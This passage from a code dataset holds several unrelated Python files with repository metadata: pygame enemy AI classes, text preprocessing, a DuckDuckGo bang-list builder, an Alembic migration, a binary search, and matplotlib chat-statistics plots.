*= choice((-1, 1))\n\n # update y position and check collisions with tiles\n self.vector.y += GRAVITY\n self.rect.y += self.vector.y\n self.check_vertical_collisions(set.union(tiles, platforms))\n\n # set max falling spedd - temp fix for bug with platform collision\n if self.vector.y > 18:\n self.vector.y = 18\n\n # blinking if damaged\n if self.blinking:\n self.blinking -= 1\n if sin(get_ticks()) >= 0:\n self.image.set_alpha(255)\n else:\n self.image.set_alpha(63)\n else:\n self.image.set_alpha(255)\n\n # draw enemy on the 
screen\n self.draw(screen, scroll)\n\n\nclass Spider(EnemyBase):\n def __init__(self, position: tuple, images: tuple, gold_group: Group):\n super().__init__(position, 6, (1, 2), (5, 6), (0, 2), gold_group)\n\n self.animations = {\"idle\": images[0], \"run\": images[1]}\n self.frame_index = 0\n self.action = \"idle\"\n self.cooldowns = {\"idle\": 0.2, \"run\": 0.4}\n self.image = self.animations[self.action][self.frame_index]\n\n self.score_amount = 60\n\n self.vector.x = self.speed * choice((-1, 1))\n\n self.rect = self.image.get_rect(topleft=position)\n\n def update_action(self, new_action: str):\n if new_action != self.action:\n self.action = new_action\n self.frame_index = 0\n\n def check_constraints(self, constraints: set):\n for constraint in constraints:\n if self.rect.colliderect(constraint):\n self.vector.x *= -1\n\n def update(self, screen: Surface, scroll: list, tiles: set, platforms: set, player_rect: Rect, constraints: Group):\n if not self.idling:\n # random idle\n if randint(1, 50) == 1:\n self.idling = True\n self.update_action(\"idle\")\n self.idling_counter = randint(30, 70)\n \n # update x position and check for horizontal collisions\n self.rect.x += self.vector.x\n self.check_horizontal_collisions(tiles)\n self.check_constraints(constraints)\n else:\n self.idling_counter -= 1\n # after idle - stop idling, randomly select direction of moving\n if self.idling_counter <= 0:\n self.idling = False\n self.update_action(\"run\")\n self.vector.x *= choice((-1, 1))\n\n # update y position and check collisions with tiles\n self.vector.y += GRAVITY\n self.rect.y += self.vector.y\n self.check_vertical_collisions(set.union(tiles, platforms))\n\n # set max falling spedd - temp fix for bug with platform collision\n if self.vector.y > 18:\n self.vector.y = 18\n\n # update animation frame\n self.frame_index += self.cooldowns[self.action]\n if self.frame_index >= len(self.animations[self.action]):\n self.frame_index = 0\n # set new frame to the image and flip it if necessary\n self.image = self.animations[self.action][floor(self.frame_index)]\n\n # blinking if damaged\n if self.blinking:\n self.blinking -= 1\n if sin(get_ticks()) >= 0:\n self.image.set_alpha(255)\n else:\n self.image.set_alpha(63)\n else:\n self.image.set_alpha(255)\n\n # draw enemy on the screen\n self.draw(screen, scroll)\n\n\nclass SpiderAdvanced(EnemyBase):\n def __init__(self, position: tuple, images: tuple, gold_group: Group):\n super().__init__(position, 6, (1, 2), (5, 6), (0, 2), gold_group)\n\n self.animations = {\"idle\": images[0], \"run\": images[1]}\n self.frame_index = 0\n self.action = \"idle\"\n self.cooldowns = {\"idle\": 0.2, \"run\": 0.4}\n self.image = self.animations[self.action][self.frame_index]\n self.flip = False\n\n self.score_amount = 120\n\n self.rect = self.image.get_rect(topleft=position)\n self.vision_rect = Rect(0, 0, 640, 240)\n\n def update_action(self, new_action: str):\n if new_action != self.action:\n self.action = new_action\n self.frame_index = 0\n\n def check_constraints(self, constraints: set):\n for constraint in constraints:\n if self.rect.colliderect(constraint):\n self.vector.x *= -1\n\n def update(self, screen: Surface, scroll: list, tiles: set, platforms: set, player_rect: Rect, contraints: Group):\n if not self.idling:\n # random idle\n if randint(1, 50) == 1:\n self.idling = True\n self.update_action(\"idle\")\n self.idling_counter = randint(30, 70)\n \n # update x position and check for horizontal collisions\n self.rect.x += self.vector.x\n 
self.check_horizontal_collisions(tiles)\n self.check_constraints(contraints)\n else:\n self.idling_counter -= 1\n # after idle - stop idling, randomly select direction of moving\n if self.idling_counter <= 0:\n self.idling = False\n self.update_action(\"run\")\n self.vector.x *= choice((-1, 1))\n\n # update y position and check collisions with tiles\n self.vector.y += GRAVITY\n self.rect.y += self.vector.y\n self.check_vertical_collisions(set.union(tiles, platforms))\n\n # set max falling spedd - temp fix for bug with platform collision\n if self.vector.y > 18:\n self.vector.y = 18\n\n # update enemy vision\n self.vision_rect.midbottom = self.rect.midbottom\n # if enemy \"sees\" the player\n if self.vision_rect.colliderect(player_rect):\n self.idling = False\n self.update_action(\"run\")\n # change enemy direction to go after the player\n if player_rect.x < self.rect.x - 5:\n self.vector.x = -self.speed\n elif player_rect.x > self.rect.x + 5:\n self.vector.x = self.speed\n else:\n self.vector.x = 0\n elif self.vector.x == 0:\n self.vector.x = self.speed * choice((-1, 1))\n # TEMP: enemy vision\n # draw_rect(screen, GOLD, (self.vision_rect.left - scroll[0], self.vision_rect.top - scroll[1], self.vision_rect.width, self.vision_rect.height))\n\n if self.vector.x < 0:\n self.flip = False\n elif self.vector.x > 0:\n self.flip = True\n # update animation frame\n self.frame_index += self.cooldowns[self.action]\n if self.frame_index >= len(self.animations[self.action]):\n self.frame_index = 0\n # set new frame to the image and flip it if necessary\n self.image = flip(self.animations[self.action][floor(self.frame_index)], self.flip, False)\n\n # blinking if damaged\n if self.blinking:\n self.blinking -= 1\n if sin(get_ticks()) >= 0:\n self.image.set_alpha(255)\n else:\n self.image.set_alpha(63)\n else:\n self.image.set_alpha(255)\n\n # draw enemy on the screen\n self.draw(screen, scroll)\n\n\nclass Bat(EnemyBase):\n def __init__(self, position: tuple, images: tuple, gold_group: Group):\n super().__init__(position, 10, (1, 3), (4, 6), (0, 4), gold_group)\n\n self.animations = {\"idle\": images[0], \"fly\": images[1]}\n self.frame_index = 0\n self.action = \"idle\"\n self.cooldowns = {\"idle\": 0.01, \"fly\": 0.25}\n self.image = self.animations[self.action][self.frame_index]\n self.flip = False\n\n self.vision_rect = Rect(0, 0, 640, 360)\n self.spotted_player = False\n\n self.score_amount = 120\n\n self.move_count = 30\n\n def check_horizontal_collisions(self, tiles: set):\n for tile in tiles:\n if tile.rect.colliderect(self.rect):\n # touching tile right wall\n if self.vector.x < 0:\n self.rect.left = tile.rect.right\n if not self.spotted_player:\n random_angle = randint(-90, 90)\n self.vector.x = round(self.speed * cos(radians(random_angle)))\n self.vector.y = round(self.speed * sin(radians(random_angle)))\n break\n # touching tile left wall\n elif self.vector.x > 0:\n self.rect.right = tile.rect.left\n if not self.spotted_player:\n random_angle = randint(90, 270)\n self.vector.x = round(self.speed * cos(radians(random_angle)))\n self.vector.y = round(self.speed * sin(radians(random_angle)))\n break\n\n def check_vertical_collisions(self, tiles: set):\n for tile in tiles:\n if tile.rect.colliderect(self.rect):\n # touching floor\n if self.vector.y > 0:\n self.rect.bottom = tile.rect.top\n if not self.spotted_player:\n random_angle = randint(180, 360)\n self.vector.x = round(self.speed * cos(radians(random_angle)))\n self.vector.y = round(self.speed * sin(radians(random_angle)))\n break\n # 
touching ceiling\n elif self.vector.y < 0:\n self.rect.top = tile.rect.bottom\n if not self.spotted_player:\n random_angle = randint(0, 180)\n self.vector.x = round(self.speed * cos(radians(random_angle)))\n self.vector.y = round(self.speed * sin(radians(random_angle)))\n break\n\n def get_damage(self, damage: int):\n self.update_action(\"fly\")\n self.health -= damage\n self.blinking = 30\n if self.health <= 0:\n if self.gold_amount > 0:\n self.gold_group.add(Gold((randint(self.rect.left, self.rect.right), self.rect.bottom), self.gold_amount))\n self.kill()\n return self.score_amount\n\n def update_action(self, new_action: str):\n if new_action != self.action:\n self.action = new_action\n self.frame_index = 0\n\n def update(self, screen: Surface, scroll: list, tiles: set, platforms: set, player_rect: Rect, constraints: Group):\n if self.action == \"fly\":\n if self.vector.x > 0:\n self.flip = True\n elif self.vector.x < 0:\n self.flip = False\n # update animation frame\n self.frame_index += 0.2\n if self.frame_index >= len(self.animations[self.action]):\n self.frame_index = 0\n # set new frame to the image and flip it if necessary\n self.image = flip(self.animations[self.action][floor(self.frame_index)], self.flip, False)\n\n if self.move_count == 0:\n random_angle = randint(1, 360)\n self.vector.x = round(self.speed * cos(radians(random_angle)))\n self.vector.y = round(self.speed * sin(radians(random_angle)))\n self.idling = True\n self.idling_counter = randint(30, 50)\n self.move_count = randint(30, 50)\n \n if self.idling:\n self.idling_counter -= 1\n if self.idling_counter <= 0:\n self.idling = False\n else:\n self.move_count -= 1 \n # update x position and check for horizontal collisions\n self.rect.x += self.vector.x\n self.check_horizontal_collisions(tiles)\n\n # update y position and check collisions with tiles\n self.rect.y += self.vector.y\n self.check_vertical_collisions(tiles)\n\n # update enemy vision\n self.vision_rect.center = self.rect.center\n # if enemy \"sees\" the player\n if self.vision_rect.colliderect(player_rect):\n self.update_action(\"fly\")\n self.idling = False\n self.spotted_player = True\n self.move_count = 10\n # change enemy direction to go after the player\n x_distance = player_rect.centerx - self.rect.centerx\n y_distance = player_rect.centery - self.rect.centery - 24\n angle = atan2(y_distance, x_distance)\n self.vector.x = round(self.speed * cos(angle))\n self.vector.y = round(self.speed * sin(angle))\n else:\n self.spotted_player = False\n \n # blinking if damaged\n if self.blinking:\n self.blinking -= 1\n if sin(get_ticks()) >= 0:\n self.image.set_alpha(255)\n else:\n self.image.set_alpha(63)\n else:\n self.image.set_alpha(255)\n\n # draw enemy on the screen\n self.draw(screen, scroll)\n","repo_name":"badzianga/mine-shot","sub_path":"data/modules/entities.py","file_name":"entities.py","file_ext":"py","file_size_in_byte":31636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22548447766","text":"import re\nimport nltk\n\nSTOPWORDS = open('resources/stopwords.txt').read().split('\\n')\n\ndef split_remove_punctuation(text):\n word_list = re.split('\\W+', text) # split into words, without punctuation\n while '' in word_list: # quick fix, regex adds empty string\n word_list.remove('') \n word_list = [word.lower() for word in word_list] # lower everything\n\n return word_list\n\ndef remove_stopwords(word_list, words_to_keep=[]):\n \"\"\"Doesn't remove the words in words_to_keep if they are 
present and they are indeed stopwords\"\"\"\n if words_to_keep and isinstance(words_to_keep, str):\n words_to_keep = split_remove_punctuation(words_to_keep)\n\n for w in STOPWORDS:\n if w not in words_to_keep:\n while w in word_list:\n # list.remove only removes an element one time\n word_list.remove(w)\n\n return word_list\n\ndef stem(word_list):\n p = nltk.stem.PorterStemmer()\n return [p.stem(word) for word in word_list]\n\ndef get_bigrams(word_list):\n return [(word_list[i], word_list[i+1]) for i in range(len(word_list)-1) if word_list[i] != word_list[i+1]]\n","repo_name":"jkafrouni/feedback_search","sub_path":"feedback_search/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"199578005","text":"import json\nimport yaml\nimport requests\n\n\ndef get_bang_dict(download=False):\n if download:\n url=\"https://duckduckgo.com/bang.js\"\n\n src_dict={}\n\n\n try:\n r = requests.get(url,timeout=5)\n r.raise_for_status()\n src_dict = json.loads(r.text)\n with open(\"bang.js\",\"w\") as f:\n f.write(r.text)\n\n except:\n src_dict=get_bang_dict(download=False)\n\n else:\n with open(\"bang.js\", \"r\") as f:\n src_dict = json.load(f)\n\n return src_dict\n\nbang_dict={}\nfor bang in get_bang_dict():\n bang_dict[bang['t']] = bang['u']\n\nwith open(\"patch.yaml\", \"r\") as f:\n patch = yaml.safe_load(f)\n\nfor bang in patch:\n bang_dict[bang] = patch[bang]\n\nwith open(\"bang_full.yaml\", \"w\") as f:\n yaml.safe_dump(bang_dict, f)\n\nwith open(\"bang_full.js\", \"w\") as f:\n f.write(\"const lookup = \")\n\nwith open(\"bang_full.js\", \"a\") as f:\n json.dump(bang_dict, f)\n\n","repo_name":"ouyen/bang_searh.js","sub_path":"dict/get_dict.py","file_name":"get_dict.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74342353154","text":"from car_program import Car\nfrom car_ui import UI\n\n# Next, design a program that creates a Car object then calls the accelerate method five times. \n# After each call to the accelerate method, get the current speed of the car and display it. \n# Then call the brake method five times. 
\n\ndef TestCar():\n \n ui = UI()\n\n vroom = Car(1980, \"Ford Capri 2.8i\")\n \n #call the methods in order\n \n ui.red_light()\n ui.yellow_light()\n ui.green_light()\n ui.car_sfx()\n ui.roadway()\n\n for i in range(5):\n vroom.accelerate()\n vroom.up_speed()\n\n for i in range(5):\n vroom.brake()\n vroom.down_speed()\n \n vroom.car_stop() \n ui.roadway()\n \nTestCar()","repo_name":"rei-kaizen/data-abstraction-encapsulation","sub_path":"car/test_car.py","file_name":"test_car.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"32440651076","text":"\"\"\"empty message\n\nRevision ID: f610bf799e52\nRevises: \nCreate Date: 2021-11-03 13:18:46.531200\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nimport random\nimport string\n\n\n# revision identifiers, used by Alembic.\nrevision = 'f610bf799e52'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\ndef get_random_string(length = 16):\n characters = string.ascii_letters + string.digits + string.punctuation\n characters = characters.replace('\"', '').replace(\"'\", \"\").replace('`', '')\n return ''.join(random.choice(characters) for i in range(length))\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n example_table = op.create_table('Examples',\n sa.Column('IdExample', sa.Integer(), nullable=False),\n sa.Column('Description', sa.String(255), nullable=False),\n sa.PrimaryKeyConstraint('IdExample')\n )\n op.bulk_insert(example_table, [\n {\"Description\": get_random_string(random.randint(8, 20))} for i in range(200)\n ])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('Examples')\n # ### end Alembic commands ###\n","repo_name":"DavidCuy/flask-pattern","sub_path":"code/{{cookiecutter.directory_name}}/migrations/versions/f610bf799e52_.py","file_name":"f610bf799e52_.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
{"seq_id":"7448579313","text":"\"\"\"\nBinary search\nThe input array must be sorted\nTime complexity: O(log n)\n\nAlgorithm idea:\n1. Take the middle index of the array (mid)\n2. Compare the target value with the middle value; if equal, return mid; if the middle value is larger, keep searching the left half, otherwise the right half\n\"\"\"\n\n\ndef binary_search(sorted_array, val):\n if not sorted_array:\n return -1\n\n beg = 0\n end = len(sorted_array) - 1\n\n while beg <= end:\n # compute the middle index of the array\n mid = int((beg + end) / 2) # beg + (end-beg)/2\n\n if sorted_array[mid] == val:\n return mid\n elif sorted_array[mid] > val:\n end = mid - 1\n else:\n beg = mid + 1\n\n return -1\n\n\ndef test_binary_search():\n # assert 0\n a = list(range(10))\n\n # how to design test cases: (normal, invalid and boundary values)\n\n # normal value\n assert binary_search(a, 1) == 1\n\n # invalid values\n assert binary_search(None, 1) == -1\n assert binary_search(a, -1) == -1\n\n # boundary value\n assert binary_search(a, 0) == 0\n\n # TDD, test-driven development\n","repo_name":"yanshugang/study_data_structures_and_algorithms","sub_path":"search_algorithms/s01_binary_search.py","file_name":"s01_binary_search.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"452443389","text":"# -*- coding: utf-8 -*-\nimport textdistance\nfrom .phonetize import translit\nimport re\n\n\ndef compute_distance(text1, text2, algorithm='damerau_levenshtein',\n normalize=True, qval=1):\n\n algorithm = algorithm.lower()\n\n text1 = translit(text1) \n text2 = translit(text2)\n\n def name_error():\n raise NameError('You have entered the wrong algorithm 
name.\\n'\n 'Possible values: \"hamming\", \"levenshtein\", '\n '\"damerau_levenshtein\" (default), \"jaro\", '\n '\"jaro_winkler\", \"gotoh\", \"smith_waterman\"')\n\n return getattr(getattr(textdistance,\n 'Hamming' if algorithm == 'hamming' else\n 'Levenshtein' if algorithm == 'levenshtein' else\n 'DamerauLevenshtein' if algorithm == 'damerau_levenshtein' else\n 'Jaro' if algorithm == 'jaro' else\n 'JaroWinkler' if algorithm == 'jaro_winkler' else\n 'SmithWaterman' if algorithm == 'smith_waterman' else\n name_error()\n )(qval=qval), 'normalized_distance' if normalize else 'distance')(text1,\n text2)\n","repo_name":"fostroll/phonetized_ner_srv","sub_path":"srv/app/lib/text_distance.py","file_name":"text_distance.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30781066405","text":"import os\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\nfrom utils.emoji import EMOJI_FOLDER\nfrom utils.other import counter\n\nWIDTH = 1/1.5\n\n##### utils #####\n\ndef _rl(a):\n\treturn range(len(a))\n\n##### general #####\n\ndef pie(data, labels=None, title=None, legend=True, legend_title=None, axis=\"equal\", **kwargs):\n\tif labels:\n\t\tplt.pie(data, labels=labels)\n\telse:\n\t\tplt.pie(data)\n\n\tif title:\n\t\tplt.title(title)\n\n\n\tif legend:\n\t\tif legend_title:\n\t\t\tplt.legend(title=legend_title)\n\t\telse:\n\t\t\tplt.legend()\n\t\t\t\n\tif axis:\n\t\tplt.axis(axis)\t\n\n\tplt.show()\n\ndef bar(data, names=None, color=\"blue\", title=None, axis=None, show=True):\n\t# create a bar \n\tplt.bar(_rl(data), data, WIDTH, color=color)\n\n\t# sending an empty list (which erases the xticks) is allowed\n\tif names is not None:\n\t\t# plt.xticks(_rl(data) + WIDTH*0.5, names)\n\t\tplt.xticks(_rl(data), names)\n\n\tif title:\n\t\tplt.title(title)\n\n\tif axis:\n\t\tif type(axis) is list:\n\t\t\tplt.axis(axis)\n\t\tif type(axis) is type(lambda x:x):\n\t\t\tplt.axis(axis(plt.axis()))\n\n\t# mpl.rc('font', family='Arial')\n\t# mpl.rc('font', **{\n\t# \t'sans-serif' : 'Arial',\n\t# \t'family' : 'sans-serif'\n\t# })\n\n\tif show:\n\t\tplt.show()\n\ndef bar_2(data, names=[None, None], color=[\"blue\", \"red\"], title=[\"left\", \"right\"], axis=None):\n\tplt.subplot(1,2,1) # rows, columns, plot number\n\tbar(\n\t\tdata=data[0],\n\t\tnames=names[0],\n\t\tcolor=color[0],\n\t\ttitle=title[0],\n\t\taxis=axis,\n\t\tshow=False\n\t)\n\tplt.subplot(1,2,2) # rows, columns, plot number\n\tbar(\n\t\tdata=data[1],\n\t\tnames=names[1],\n\t\tcolor=color[1],\n\t\ttitle=title[1],\n\t\taxis=axis,\n\t\tshow=True\n\t)\n\ndef hist(data, **kwargs):\n\t# data should be a list\n\t# create a dict of how many times each object appears\n\tif type(data) is not list:\n\t\treturn(bool(print(\"data should be a list!\")))\n\tif type(data[0]) is list or type(data[0]) is tuple:\n\t\tc = data\n\telif \"__iter__\" in dir(data[0]) and type(data[0]) is not str:\n\t\tc = [list(i) for i in data]\n\telse:\n\t\tc = counter(data)\n\n\tif \"sort\" in kwargs:\n\t\tif kwargs[\"sort\"].lower() == \"counter\":\n\t\t\tc.sort(key=lambda x: x[1])\n\t\telse:\n\t\t\tc.sort(key=kwargs[\"sort\"])\n\t\tkwargs.pop(\"sort\")\n\n\tif \"amount\" in kwargs:\n\t\tc = c[-kwargs[\"amount\"]:]\n\t\tkwargs.pop(\"amount\")\n\n\tif \"map\" in kwargs:\n\t\tc = list(map(kwargs[\"map\"], c))\n\t\tkwargs.pop(\"map\")\n\n\treturn bar([i[1] for i in c], names=[i[0] for i in c], **kwargs)\n\ndef hist_2(data, color=[\"blue\", 
\"red\"], title=[\"left\", \"right\"], **kwargs):\n\t# data needs to be a list of (emoji_unicode_id, amount)\n\n\tif \"sort\" in kwargs:\n\t\tif kwargs[\"sort\"].lower() == \"counter\":\n\t\t\tdata[0].sort(key=lambda x: x[1])\n\t\t\tdata[1].sort(key=lambda x: x[1])\n\t\telse:\n\t\t\tdata[0].sort(key=kwargs[\"sort\"])\n\t\t\tdata[1].sort(key=kwargs[\"sort\"])\n\t\tkwargs.pop(\"sort\")\n\n\tif \"amount\" in kwargs:\n\t\tdata[0] = data[0][-kwargs[\"amount\"]:]\n\t\tdata[1] = data[1][-kwargs[\"amount\"]:]\n\t\tkwargs.pop(\"amount\")\n\n\tif \"map\" in kwargs:\n\t\tdata[0] = list(map(kwargs[\"map\"], data[0]))\n\t\tdata[1] = list(map(kwargs[\"map\"], data[1]))\n\t\tkwargs.pop(\"map\")\n\n\t# data_names is used to display the emojis, it can be joined\n\tdata_names = [i[0] for i in data[0]] + [i[0] for i in data[1]]\n\t# data_amount is used to display the bar graph for each user\n\tdata_amount = [\n\t\t[i[1] for i in data[0]],\n\t\t[i[1] for i in data[1]]\n\t]\n\tcolumns = len(data[0]) + len(data[1])\n\n\tbar(\n\t\tdata=data_amount[0] + [0]*len(data_amount[1]),\n\t\tnames=data_names,\n\t\tcolor=color[0],\n\t\t\n\t\tshow=False\n\t)\n\t\n\tbar(\n\t\tdata=[0]*len(data_amount[0]) + data_amount[1],\n\t\tnames=data_names,\n\t\tcolor=color[1],\n\t\ttitle=\" - \".join(title),\n\t\tshow=True\n\t)\n\n\n##### emoji #####\n\nMAX_EMOJI_AMOUNT = 10\ndef _fit_axis(x):\n\treturn [\n\t\tx[0], # x-min\n\t\tx[1] - (1-WIDTH), # x-max\n\t\t# each bar-column gets '1' size, and its width is WIDTH. Thus, there is a (1-WIDTH) margin left at the end\n\t\tx[2], # y-min\n\t\tx[3] # y-max\n\t]\ndef emoji_bar(data, **kwargs):\n\t# data needs to be a list of (emoji_unicode_id, amount)\n\n\tif \"sort\" in kwargs:\n\t\tif type(kwargs[\"sort\"]) is str \\\n\t\t\tand kwargs[\"sort\"].lower() == \"counter\":\n\t\t\tdata.sort(key=lambda x: x[1])\n\t\telse:\n\t\t\tdata.sort(key=kwargs[\"sort\"])\n\t\tkwargs.pop(\"sort\")\n\n\tif \"amount\" in kwargs:\n\t\tdata = data[-kwargs[\"amount\"]:]\n\t\tkwargs.pop(\"amount\")\n\n\tif \"map\" in kwargs:\n\t\tdata = list(map(kwargs[\"map\"], data))\n\t\tkwargs.pop(\"map\")\n\n\tif len(data) > MAX_EMOJI_AMOUNT:\n\t\treturn(bool(print(\"len(data) is bigger than MAX_EMOJI_AMOUNT (%s)\" % MAX_EMOJI_AMOUNT)))\n\n\tif \"emoji_path\" in kwargs:\n\t\tEMOJI_PATH = kwargs[\"emoji_path\"]\n\t\tkwargs.pop(\"emoji_path\")\n\telse:\n\t\tEMOJI_PATH = EMOJI_FOLDER + \"/%s.png\"\n\n\tdata_names = [i[0] for i in data]\n\tdata_amount = [i[1] for i in data]\n\tcolumns = len(data)\n\n\t# safety\n\tif not all(map(lambda x: os.path.exists(EMOJI_PATH % x), data_names)):\n\t\treturn(bool(print(\"Invalid emoji unicode-id given!\")))\n\n\t# plot emojis\n\tfor i in range(len(data)):\n\t\t# read the image of the emoji\n\t\timg = mpimg.imread(EMOJI_PATH % data_names[i])\n\t\tplt.subplot(\n\t\t\tMAX_EMOJI_AMOUNT, # amount of rows\n\t\t\tcolumns, # amount of columns\n\t\t\t1 + ( columns * (MAX_EMOJI_AMOUNT-1) ) + i # plot number\n\t\t\t# 1 based + all the rows except the last one + the index in the last row\n\t\t)\n\t\tplt.imshow(img)\n\t\tplt.axis(\"off\")\n\n\t# plot the bar graph\n\t# focus on all the columns and on all the rows but the last one\n\tplt.subplot(MAX_EMOJI_AMOUNT,1,(1,MAX_EMOJI_AMOUNT-1))\n\n\treturn bar(\n\t\tdata=data_amount,\n\t\tnames=[], # remove the x-axis labels\n\t\ttitle=\"EMOJI!!!\",\n\t\taxis=_fit_axis\n\t)\n\ndef emoji_bar_2(data, color=[\"blue\", \"red\"], title=[\"left\", \"right\"], **kwargs):\n\t# data needs to be a list of (emoji_unicode_id, amount)\n\n\tif \"sort\" in kwargs:\n\t\tif 
type(kwargs[\"sort\"]) is str \\\n\t\t\tand kwargs[\"sort\"].lower() == \"counter\":\n\t\t\tdata[0].sort(key=lambda x: x[1])\n\t\t\tdata[1].sort(key=lambda x: x[1])\n\t\telse:\n\t\t\tdata[0].sort(key=kwargs[\"sort\"])\n\t\t\tdata[1].sort(key=kwargs[\"sort\"])\n\t\tkwargs.pop(\"sort\")\n\n\tif \"amount\" in kwargs:\n\t\tdata[0] = data[0][-kwargs[\"amount\"]:]\n\t\tdata[1] = data[1][-kwargs[\"amount\"]:]\n\t\tkwargs.pop(\"amount\")\n\n\tif \"map\" in kwargs:\n\t\tdata[0] = list(map(kwargs[\"map\"], data[0]))\n\t\tdata[1] = list(map(kwargs[\"map\"], data[1]))\n\t\tkwargs.pop(\"map\")\n\n\tif len(data[0]) + len(data[1]) > MAX_EMOJI_AMOUNT:\n\t\treturn(bool(print(\"len(data[0+1]) is bigger than MAX_EMOJI_AMOUNT (%s)\" % MAX_EMOJI_AMOUNT)))\n\n\tif \"emoji_path\" in kwargs:\n\t\tEMOJI_PATH = kwargs[\"emoji_path\"]\n\t\tkwargs.pop(\"emoji_path\")\n\telse:\n\t\tEMOJI_PATH = EMOJI_FOLDER + \"/%s.png\"\n\n\t# data_names is used to display the emojis, it can be joined\n\tdata_names = [i[0] for i in data[0]] + [i[0] for i in data[1]]\n\t# data_amount is used to display the bar graph for each user\n\tdata_amount = [\n\t\t[i[1] for i in data[0]],\n\t\t[i[1] for i in data[1]]\n\t]\n\tcolumns = len(data[0]) + len(data[1])\n\n\t# safety\n\tif not all(map(lambda x: os.path.exists(EMOJI_PATH % x), data_names)):\n\t\treturn(bool(print(\"Invalid emoji unicode-id given!\")))\n\n\t# plot emojis\n\tfor i in range(columns):\n\t\t# read the image of the emoji\n\t\timg = mpimg.imread(EMOJI_PATH % data_names[i])\n\t\tplt.subplot(\n\t\t\tMAX_EMOJI_AMOUNT, # amount of rows\n\t\t\tcolumns, # amount of columns\n\t\t\t1 + ( columns * (MAX_EMOJI_AMOUNT-1) ) + i # plot number\n\t\t\t# 1 based + all the rows except the last one + the index in the last row\n\t\t)\n\t\tplt.imshow(img)\n\t\tplt.axis(\"off\")\n\n\t# plot the bar graph\n\tplt.subplot(MAX_EMOJI_AMOUNT,1,(1,MAX_EMOJI_AMOUNT-1))\n\n\tbar(\n\t\tdata=data_amount[0] + [0]*len(data_amount[1]),\n\t\tnames=[], # remove the x-axis labels\n\t\tcolor=color[0],\n\t\t\n\t\tshow=False\n\t)\n\t\n\tbar(\n\t\tdata=[0]*len(data_amount[0]) + data_amount[1],\n\t\tnames=[], # remove the x-axis labels\n\t\tcolor=color[1],\n\t\ttitle=\" - \".join(title),\n\t\tshow=True\n\t)\n\n##### dates #####\n\nSUPPORTED_HOURS_DELTA = [0.5, 1, 2]\nDAYS = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']\nMONTHS = [\"Jan\", \"Feb\", \"Mar\", \"Apr\", \"May\", \"Jun\", \"Jul\", \"Aug\", \"Sep\", \"Oct\", \"Nov\", \"Dec\"]\n\ndef _filter_dates(data, start, end):\n\t\"data = wp.d.lines\"\n\tif \"__iter__\" in dir(data[0]):\n\t\tdata = map(lambda x:x[0], data)\n\n\tif start and end:\n\t\treturn [i for i in data if start <= i < end]\n\telif start and not end:\n\t\treturn [i for i in data if start <= i ]\n\telif not start and end:\n\t\treturn [i for i in data if i < end]\n\telse:\n\t\treturn [i for i in data if i ]\n\ndef hours(data, delta=0.5, start=None, end=None):\n\t\"data = wp.d.lines\"\n\tif delta not in SUPPORTED_HOURS_DELTA:\n\t\treturn(bool(print(\"Unsupported hour delta\")))\n\n\t# create a list of all the hours with apropriate delta\n\tminutes_groups = [0] * int(24. 
/ delta)\n\n\tfor i in _filter_dates(data, start, end):\n\t\tminutes_groups[\n\t\t\t(i.minute + i.hour * 60)\n\t\t\t //\n\t\t\tint(60 * delta)\n\t\t] += 1\n\n\tif delta == 0.5:\n\t\t# minutes_groups_titles = [\n\t\t# \t\"%02d\" % (i // 2)\n\t\t# \t +\n\t\t# \t(\":30\" if i % 2 else \":00\")\n\t\t# \tfor i in range(48)\n\t\t# ]\n\t\tminutes_groups_titles = [\n\t\t\t(\n\t\t\t\t'.5'\n\t\t\t\t if\n\t\t\t\ti % 2\n\t\t\t\t else\n\t\t\t\t\"%02d\" % (i * delta)\n\t\t\t)\n\t\t\tfor i in range(48)\n\t\t]\n\telif delta == int(delta):\n\t\tminutes_groups_titles = [\n\t\t\t\"%02d:00\" % (i * delta)\n\t\t\tfor i in range(24 // delta)\n\t\t]\n\n\treturn bar(minutes_groups, minutes_groups_titles, title=\"Hours\")\n\ndef days(data, start=None, end=None):\n\t\"data = wp.d.lines\"\n\tweekday = [0]*7\n\tfor i in _filter_dates(data, start, end):\n\t\tweekday[i.weekday()] += 1\n\n\treturn bar(weekday, DAYS, title=\"Weekdays\")\n\ndef months(data, start=None, end=None):\n\t\"data = wp.d.lines\"\n\tmonths = [0]*12\n\tfor i in _filter_dates(data, start, end):\n\t\tmonths[i.month - 1] += 1\n\n\treturn bar(months, MONTHS, title=\"Months\")\n","repo_name":"dor2727/Whatsapp","sub_path":"utils/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":9348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"11536803646","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport django_filters\nfrom django.conf import settings\nfrom django.contrib import messages\nfrom django.contrib.sites.models import Site\nfrom django.db.models import Sum\nfrom django.http import HttpResponse\nfrom django.shortcuts import render_to_response, redirect\nfrom django.urls import reverse\nfrom django.utils.translation import gettext as _\nfrom django.views.decorators.clickjacking import xframe_options_exempt\nfrom django.views.generic import UpdateView\nfrom django_filters.views import FilterView\nfrom helpers import FilterMixin\n\nfrom core.filters.LabeledOrderingFilter import 